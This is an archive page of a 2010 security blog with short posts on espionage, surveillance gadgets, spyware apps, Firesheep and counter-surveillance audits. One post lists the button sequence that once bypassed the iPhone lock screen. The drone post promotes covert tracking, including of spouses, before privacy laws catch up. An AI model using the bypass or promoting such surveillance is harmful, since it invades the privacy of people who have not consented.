Saturday, November 6, 2010

Sprint Excludes Chinese Companies From Contract Over Security Fears

Sprint Nextel is excluding Chinese telecommunications-equipment makers Huawei Technologies and ZTE from a contract worth billions of dollars largely because of national security concerns in Washington. The Defense Department and some U.S. lawmakers have been increasingly concerned about the two companies’ ties to the Chinese government and military, and the security implications of letting their equipment into critical U.S. infrastructure. Some officials argue China’s military could use Huawei or ZTE equipment to disrupt or intercept American communications. (more)

Wednesday, November 3, 2010

Personal Spying - Drones On

Here at Kevin's Security Scrapbook I have been watching the development of drones for years. These are my two personal favorites: Do It Yourself Sky Spies - The Draganflyer and "MAV" The Scariest SiFi Movie You'll See this Year.

If you followed the Scrapbook, you already knew where this is going.  

Time for an official FutureWatch prediction... Private Investigators will start selling off all the old TSCM gadgets they bought which never turned a profit to invest in a drone. Although the applications will be limited (by practicality and law), drones will offer solutions to previously unsolvable problems. 

Early adopters will easily recoup their investments and turn a profit via rental of the drone for special assignments, and/or selling the photos/video at a premium price. In fact, having a drone should bring in previously unattainable assignments. 

P.S.
This is a window of opportunity. It may take up to ten years for new laws (and FAA regulations) protecting public safety and privacy to catch up.

...via The Wall Street Journal...
Personal drones aren't yet plying U.S. flyways. But an arms race is building among people looking to track celebrities, unfaithful lovers or even wildlife. Some organizations would like them for emergency operations in areas hit by natural disasters. Several efforts to develop personal drones are scheduled for completion in the next year.

"If the Israelis can use them to find terrorists, certainly a husband is going to be able to track a wife who goes out at 11 o'clock at night and follow her," said New York divorce lawyer Raoul Felder. (more)

The AR.Drone, an iPhone-controlled helicopter powered by four separate blades
Can't wait?
Check out what's available now!
A.R. Drone (specs) (video)
AERYON Labs (specs) (video)
And many more

SpyCam Tee Shirt

"Even Mr. Bond has to have an off day when all his fancy duds are at the $1.50 Dry Cleaners and he's down to his last pair of underpants. But just because his suit jackets are gone doesn't mean he can't hide fancy spy gadgets on his person. Before he drags out the t-shirts he wore while canvassing for decade-old political campaigns or his favorite band that broke up when he was in college, he goes for his old standby, the From Tokyo With Love Electronic Spy Camera Shirt.

It's so deliciously obvious. Centered in the artwork on the shirt is the man himself, holding a camera to his face. But not just a picture of a camera. Hidden behind the soft cotton exterior is a fully-functioning spy camera. That's right. Whatever your chest can see, the camera can see. A cable connects the camera to a small black box that fits discreetly in your pocket. Just reach in, press the button, and your shirt will capture the evidence before you." (more)

Tuesday, November 2, 2010

Open Season on Marital Bugging and Tapping in the United States Court of Appeals for the Fifth Circuit

A Texas court has ruled that a husband accused of monitoring his wife's computer through a keystroke logger did not violate federal wiretapping laws. 

Larry Bagley was sued in June by his wife Rhea Bagley, who accused him of surreptitiously placing audio recording devices in their house as well as a software keystroke logger. The Bagleys are in the process of divorcing.

The complaint in this civil case says that during the divorce proceedings, the husband revealed the existence of the surveillance tech and acknowledged that the "software recorded screenshots of activity on this computer." The husband replied in court documents that "in all conversations, the defendants' children were present and defendant was able to consent to recordation by way of vicarious consent."

U.S. District Judge Lee Rosenthal ruled on October 18 in favor of the husband, saying that the court was required to follow a Fifth Circuit decision saying that the federal wiretap law known as Title III does not apply to marital relationships.

Here are some excerpts from the court's opinion:
Whether Title III provides a remedy for interspousal wiretapping within the marital home is a question that has divided the federal courts of appeal. The Fourth, Sixth, Eighth, Tenth, and Eleventh Circuits have held that such wiretapping is actionable under Title III. The Second and Fifth Circuits have held that Title III does not apply to interspousal wiretaps. (more)

P.S. The United States Court of Appeals for the Fifth Circuit includes:

Industrial Espionage Case Expands

Silicon Valley is bracing itself for fireworks as a long-running intellectual property and industrial espionage dispute between two of the most powerful names in technology finally reaches court.

Oracle is suing its arch-rival SAP for exploiting what it says were illegal downloads of Oracle software code three years ago, and the case has now dragged in another technology titan, Hewlett-Packard, which hired the former SAP boss Leo Apotheker to be its chief executive a month ago. (more)

A few weeks ago I accused HP’s new CEO, Leo Apotheker, of overseeing an industrial espionage scheme centring on the repeated theft of massive amounts of Oracle’s software,” Mr Ellison said in a statement released this week. (more)

Book Banning Over Industrial Espionage Fears

Many of Germany's top companies are blocking access to Facebook and other social networking sites over fears of industrial espionage and other security concerns, according to a new report. Business weekly Wirtschaftswoche said that many companies on the Dax-30 blue-chip index saw an unacceptable risk posed by employees using such sites at work. (more) ...not to mention the financial drain of social notworking.

Monday, November 1, 2010

"Crito, we owe a rooster to Asclepius. Please, don't forget to pay the debt."

Greece is having a Patriot Act moment, drafting legislation that would break down privacy laws and significantly increase police power. But their catalyst is debt, not terrorism.

Draft legislation obtained by The Katimerini would create government agencies to regulate tax evasion, entitlement issues and use of public property. Police officers in these departments would have unprecedented power to eavesdrop on suspects' conversations and communications and to disguise their identity in pursuit of a suspect.

This would be a major change for a country known for strict privacy laws, according to The Katimerini. (more) (sing-a-long) (Socratic drink)

Are whack jobs bugging our Hollywood Actors?

Actor Randy Quaid (aka General George S. Merlin, "Bug Buster") and his wife, Evi... were in Canada seeking political asylum over their stated fears they would be "whacked'' if they returned to Hollywood... they fled to Canada to escape the so-called "star whackers" - a cult that is bugging their phones and hacking their computers.

"They're absolute businessmen. It's the mafia; it's organized crime," said Mrs. Quaid... The couple has said this "mafia" is behind eight celebrity, including Heath Ledger, deaths in the last 5 years. (more) (trailer)

Don't tell Mrs. Quaid. It will just upset her.

John McTiernan, director of the movie “Die Hard,” was sentenced to one year in prison for lying about his association with a private investigator, Anthony Pellicano, to illegally wiretap a movie producer. (more)

Hoist by a Voicemail Petard

Employees at a CBS affiliate in Anchorage left an accidental voicemail for an aide to GOP Senate candidate Joe Miller in which they discussed and laughed about the possibility of reporting on the appearance of sex offenders at a Miller rally. And they chatted about responding with a Twitter alert to “any sort of chaos whatsoever” including the candidate being “punched.”
 
Jerry Bever, general manager for KTVA, said in a statement that a call to Miller spokesman Randy DeSoto to discuss the candidate’s planned appearance on a newscast wasn’t disconnected after the conversation ended. The call took place during a KTVA staff meeting to plan coverage of that evening’s Miller rally in downtown Anchorage. (more)

Sunday, October 31, 2010

Hamas warns against buying cars imported from Israel

The Hamas government in the Gaza Strip is warning local politicians, government officials and faction leaders against buying cars imported from Israel for fear they may contain eavesdropping equipment or even remote-activated bombs planted by Israeli security agencies. (more)

Test your car...
If you own a late model General Motors car with OnStar, try this test. Tune your radio to 770 AM, turn up the volume and tap on the OnStar microphone near the rear view mirror. Do you hear yourself coming through the radio? No? Maybe they only bugged my car. ~Kevin

Google Bans SMS Spy App Tap

A controversial mobile phone application, which helps a cell phone user read the text messages of others secretly, has been removed from sale by Internet search engine Google.
Google said the application, called SMS Secret Replicator, violated its terms.

Once installed on a mobile phone, the Android phone application automatically creates carbon copies of incoming text messages and forwards them to a selected number - prompting fears it could be used by jealous lovers and even work colleagues to snoop on private messages. (more) (video)
Google may have dropped it from their marketplace, but doesn't mean this $9.99 app is not available elsewhere. (more
Coming soon, a way you can detect if your phone is infected with spyware. (more)

Thursday, October 28, 2010

Security Alert: iCracked

A security flaw in the iPhone allows strangers to bypass the handset’s lock screen with a few button presses.

...the quick method to circumvent an iPhone’s passcode-protected lock screen:
• tap the “Emergency Call” button,
• then enter three pound signs,
• hit the green Call button
• and immediately press the Lock button.
That simple procedure gives a snoop full access to the Phone app on the iPhone, which contains the address book, voicemail and call history. (more)

Apple:
“We’re aware of this issue and we will deliver a fix to customers as part of the iOS 4.2 software update in November." 

"Why is this important?”
Not having password protection on a smart phone leaves you open to information theft, jail-breaking and injection of spyware.

"Why does this trick exist?"
• It is a software loophole.
• It is a programmer's shortcut they forgot to patch.
• It is a programmer's Easter egg.
• It is a law enforcement backdoor never meant to become public knowledge.
Interesting question. You decide.

FutureWatch: The ability to create passwords longer than four measly digits... which is only a pool of only 10,000 passwords. ~Kevin

Wednesday, October 27, 2010

Firesheep Makes Stealing Your Wi-Fi Secrets Easy

via Steven J. Vaughan-Nichols
From all the yammering, you’d actually think there was something new about Firesheep, the Firefox extension that lets you grab login IDs, passwords, and other important information. What a joke. I, and any hacker or network administrator worth his salt, have been able to do this kind of stuff for years.

The only thing “new” about Firesheep is that how it easy makes it to do. I’m unimpressed. Anyone who was serious about grabbing your personal information has already been doing it for years. Trust me, if someone really wanted your data and you’ve been using open Wi-Fi networks, they already grabbed it.

No, the real worry isn’t about some jerk grabbing your Twitter password in a coffee house. The real worry has always been that your office Wi-Fi is easy to compromise and then someone can use a packet-sniffer to get something that really matters like your your Accounts Payable password. (more)

Need a Wi-Fi Security Audit and Compliance Inspection? (you do) Please call me. (more)

11/4/10 - UPDATE:  IBM researchers are proposing an approach to WiFi security they call Secure Open Wireless in light of the release of the Firesheep tool. (more)

11/5/10 - UPDATE: 10 Ways to Protect Yourself from Firesheep Attacks (more)

Our Spy Coin Receives the Ultimate Compliment

I give spy coins to my clients.
It is a reminder that information loss is mostly a people problem, not an electronic problem. Filing cabinets of information can walk out the door in pocket change!


Careless people often blab information, forget to secure it, toss it in the garbage can, or otherwise lose it—hundreds of laptops are lost every day. People also steal it when they become greedy, spiteful, conned, blackmailed, or caught up in a “cause.”

Investigating an information loss, however, begins with an electronic surveillance detection audit.

Here’s why...
• Serious espionage will include electronic surveillance.
• The possibility must be resolved before accusing people.
• Bugging is the easiest spy technique to discover.
• Electronic surveillance evidence helps prove your case.

Best advice...
Conduct audits on a regular basis. Uncover signs of espionage during the intelligence collection stage, before your information can be abused. (more)

A client reports back...
"I think of all of the trinket type things we’ve accumulated over the years, the spy coin is *by far* the coolest, and is made even cooler with the background story provided on the chip!!

I took mine with me to the FBI building today and had the guards there X-ray it along-side of a normal quarter to see if its secret contents could be seen on an “airport quality” X ray machine.  They printed out a copy of the scan image, I’ve attached it to this email for your amusement as well. 

Several agents commented on how well it was made, and how hard it would be to detect such a thing."